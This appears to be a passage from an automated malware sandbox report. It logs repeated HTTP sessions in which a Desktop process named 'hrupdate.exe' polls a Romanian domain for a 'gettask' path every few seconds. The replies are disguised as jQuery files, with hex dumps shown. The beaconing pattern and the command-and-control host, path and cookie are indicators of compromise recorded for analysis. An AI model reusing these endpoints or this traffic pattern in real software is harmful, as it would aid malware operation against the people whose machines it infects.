                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:24 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:23 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:24 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.4498273.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:25 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:26 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:26 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5671
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:26 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.4498333.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:28 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:29 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:28 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:29 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.4498403.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:30 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:31 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:31 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:31 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.4498463.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:32 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:33 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:33 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5649
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:33 UTC5649INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.4498523.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:35 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:35 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:35 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:35 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              39192.168.2.4498583.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:37 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:38 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:38 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5713
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:38 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              40192.168.2.4498653.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:40 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:40 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:40 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5692
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:40 UTC5692INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              41192.168.2.4498713.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:42 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:43 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:42 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:43 UTC5607INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              42192.168.2.4498773.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:44 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:45 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:45 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5628
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
                                                              2024-12-19 21:41:45 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                              Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.4498823.79.209.764437428C:\Users\user\Desktop\hrupdate.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 21:41:46 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Host: www.flntp.ro
                                                              Accept-Encoding: gzip, deflate
                                                              Cookie: __cfduid=Wo3cCq8dWybg_lLRnibZIHFJdR6wuj1FBTzJrmI0FGDL9pbOT8W-hVcxENwiCJeq9lP_4pci3bqqo4ccebIlHQRxWvLN3G1CxdocdXDWz5E7P_N2aB0CU6jI6cwRnkNCERqjnJ_dUwGjELj9A5K059xw6CQPDEvDoSDd3OJUj0Q
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              2024-12-19 21:41:47 UTC235INHTTP/1.1 200 OK
                                                              Server: nginx/1.24.0 (Ubuntu)
                                                              Date: Thu, 19 Dec 2024 21:41:47 GMT
                                                              Content-Type: application/javascript; charset=utf-8
                                                              Content-Length: 5607
                                                              Connection: close
                                                              Cache-Control: max-age=0, no-cache
                                                              Pragma: no-cache
